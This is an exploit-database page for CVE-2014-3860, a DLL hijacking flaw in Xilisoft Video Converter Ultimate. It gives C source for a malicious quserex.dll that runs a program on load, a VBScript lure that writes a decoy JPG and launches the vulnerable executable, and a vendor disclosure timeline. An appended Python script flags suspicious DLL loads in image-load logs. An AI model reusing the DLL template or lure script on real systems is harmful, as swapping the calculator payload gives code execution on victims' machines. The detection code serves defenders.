
Xilisoft Video Converter Ultimate 7.8.1 build-20140505 DLL Hijacking

Published: 02 Jun 2014 00:00:00. Reported by: Osanda Malith. Type: packetstorm. Source: packetstormsecurity.com

Xilisoft Video Converter Ultimate 7.8.1 build-20140505 DLL Hijacking exploit on Windows X

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| 0day.today | Xilisoft Video Converter Ultimate Dll Hijacking Exploit (quserex.dll) | 3 Jun 2014 00:00 | zdt |
| CVE | CVE-2014-3860 | 12 Feb 2020 17:56 | cve |
| Cvelist | CVE-2014-3860 | 12 Feb 2020 17:56 | cvelist |
| EUVD | EUVD-2014-3797 | 7 Oct 2025 00:30 | euvd |
| NVD | CVE-2014-3860 | 12 Feb 2020 18:15 | nvd |
| Prion | Design/Logic Flaw | 12 Feb 2020 18:15 | prion |
| RedhatCVE | CVE-2014-3860 | 22 May 2025 06:00 | redhatcve |

```c
/*
* Title: Xilisoft Video Converter Ultimate Dll Hijacking Exploit (quserex.dll)
* Version: 7.8.1 build-20140505 (Previous versions might be vulnerable)
* Tested on: Windows XP SP2 en
* Vendor: http://www.xilisoft.com/
* Software Link: http://www.xilisoft.com/webapp/downloader.php?product_code=x-video-converter-ultimate7
* Exploit-Author: Osanda Malith Jayathissa
* /!\ Author is not responsible for any damage you cause
* Use this material for educational purposes only
* Twitter: @OsandaMalith
* CVE: CVE-2014-3860
*/
/*
Vulnerable Executables:
1. vcloader.exe
2. vc.exe
3. vc_buy.exe
*/
#include <windows.h>
#include <stdlib.h> /* declares exit() */

int pwned()
{
    WinExec("calc", 0);
    exit(0);
    return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    pwned();
    return 0;
}

/*
As this application has no extensions associated we have to manually open a file with this application.
So we can automate this process by writing something like this ;) Place the DLL and this script in the
same location. Once the victim runs this script the DLL will be hijacked.

msg=MsgBox ("Automated POC" & chr(13) & "Coded by Osanda Malith", 64, "Xilisoft Video Converter Ultimate Dll Hijacking Exploit")
Set objFileToWrite = CreateObject("Scripting.FileSystemObject").OpenTextFile("new.jpg",2,true)
objFileToWrite.WriteLine("POC by Osanda Malith :D")
objFileToWrite.Close
file = "new.jpg"
Set oShell = CreateObject("WScript.Shell")
' Path to Xilisoft Video Converter
oShell.Run """%ProgramFiles%\Xilisoft\Video Converter Ultimate\vcloader.exe """ & file
*/
/* Disclosure Timeline
2014-04-20 : Contacted the vendor
2014-04-23 : Contacted again as I did not receive any reply
2014-04-24 : Received a response saying that it was forwarded to technicians
2014-05-16 : Contacted again since there was no reply
2014-05-20 : Received a response saying that they cannot reproduce
2014-06-01 : Contacted MITRE
2014-06-02 : Public disclosure */
//EOF
```
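For detection, the condition the PoC relies on (one of the listed executables loading a DLL from the directory of the opened file rather than from its install or system directory) can be checked in image-load telemetry. The following is an added example, not part of the original advisory or the author's code. It assumes records that use the Sysmon Event ID 7 field names `Image` and `ImageLoaded`, and assumes `C:\Windows\System32` and `C:\Windows\SysWOW64` as trusted system directories. The sample records are constructed.

```python
from ntpath import basename, dirname, normcase, normpath

# From the advisory: the executables listed as vulnerable and the DLL name.
VULNERABLE_EXES = {"vcloader.exe", "vc.exe", "vc_buy.exe"}
HIJACKED_DLL = "quserex.dll"
# Assumption: system directories treated as trusted load locations.
SYSTEM_DIRS = {normcase(r"C:\Windows\System32"), normcase(r"C:\Windows\SysWOW64")}


def norm_dir(path):
    """Directory of a Windows path, normalised (case, '..') for comparison."""
    return normcase(normpath(dirname(path)))


def find_hijack_loads(events):
    """Return (process, dll_path, reason) for loads from untrusted directories."""
    findings = []
    for ev in events:
        proc, dll = ev["Image"], ev["ImageLoaded"]
        if basename(proc).lower() not in VULNERABLE_EXES:
            continue
        # Trusted: the process's own install directory and the system dirs.
        if norm_dir(dll) == norm_dir(proc) or norm_dir(dll) in SYSTEM_DIRS:
            continue
        named = basename(dll).lower() == HIJACKED_DLL
        findings.append((basename(proc), dll,
                         "DLL named in advisory" if named else "untrusted directory"))
    return findings


APP = r"C:\Program Files\Xilisoft\Video Converter Ultimate"
# Constructed sample records (not real telemetry); DLL names other than
# quserex.dll and kernel32.dll are placeholders.
SAMPLE_EVENTS = [
    {"Image": APP + r"\vcloader.exe", "ImageLoaded": r"C:\Windows\System32\kernel32.dll"},
    {"Image": APP + r"\vcloader.exe", "ImageLoaded": r"C:\Users\alice\Downloads\quserex.dll"},
    {"Image": APP + r"\vc.exe", "ImageLoaded": APP.upper() + r"\CODEC_EXAMPLE.DLL"},
    {"Image": APP + r"\vc_buy.exe", "ImageLoaded": APP + r"\..\..\..\Temp\helper.dll"},
    {"Image": r"C:\Windows\notepad.exe", "ImageLoaded": r"C:\Users\alice\Downloads\quserex.dll"},
]

if __name__ == "__main__":
    for proc, dll, reason in find_hijack_loads(SAMPLE_EVENTS):
        print(f"ALERT {proc} loaded {dll} ({reason})")
```

Loads from the install directory match regardless of case, and a path that escapes it with `..` is normalised before comparison, so it is still reported.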
